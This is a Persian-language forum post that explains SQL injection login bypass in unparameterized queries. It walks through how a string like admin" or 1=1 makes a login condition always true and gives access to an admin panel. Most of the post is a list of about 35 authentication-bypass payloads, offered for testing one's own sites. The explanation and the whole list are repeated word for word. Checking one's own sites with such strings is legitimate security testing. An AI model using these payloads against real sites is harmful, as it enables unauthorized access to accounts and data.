rasoul2023
شنبه 28 آذر 1388, 15:19 عصر
سلام دوستان داشتم به پروژه های قدیمی نگاه میکردم یه چندتا باگ امنیتی از نوع Injection توشون پیدا کردم البته اون روزا از پارامترایز سر در نمی اوردم کلا روش کار به این صورت هست که توی Query String و یا فیلدهایی که باعث دستورات SELECT میشند و شرطی را اجرا میکنند ( ورود به سایتها ) این کدها که میزارم جواب میدند . به شرطی که پارامترایز نشده باشند .
مثلا توی این کد :
admin" or 1=1
میگه اگه یوزر Admin بود یا 1=1 بود که یه شرط همیشه درسته خوب حالا که شرط درست بود وارد پنل ادمین میشه شد .
اینم لیست اینجکشن ها میتونید روی سایتهاتون تست کنید و از لحاظ امنیتی بسنجید در آینده مطالب جامع تری قرار میدهم . امیدوارم مفید باشه .
INJECT در لغت به معنای تزریق میباشد . هکرهااز این طریق یک کد مخرب را در دستورات SQL تزریق میکنند .
'or'1'='1'or'1'='1'
'or'1'='1'or'1'='1
' or ' '='
' or ''='
admin" or "a"="a
admin" or 1=1 --
admin' or 1=1 --
admin' or 'a'='a
admin') or ('a'='a
admin") or ("a"="a
a=1)--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
مثلا توی این کد :
admin" or 1=1
میگه اگه یوزر Admin بود یا 1=1 بود که یه شرط همیشه درسته خوب حالا که شرط درست بود وارد پنل ادمین میشه شد .
اینم لیست اینجکشن ها میتونید روی سایتهاتون تست کنید و از لحاظ امنیتی بسنجید در آینده مطالب جامع تری قرار میدهم . امیدوارم مفید باشه .
INJECT در لغت به معنای تزریق میباشد . هکرهااز این طریق یک کد مخرب را در دستورات SQL تزریق میکنند .
'or'1'='1'or'1'='1'
'or'1'='1'or'1'='1
' or ' '='
' or ''='
admin" or "a"="a
admin" or 1=1 --
admin' or 1=1 --
admin' or 'a'='a
admin') or ('a'='a
admin") or ("a"="a
a=1)--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a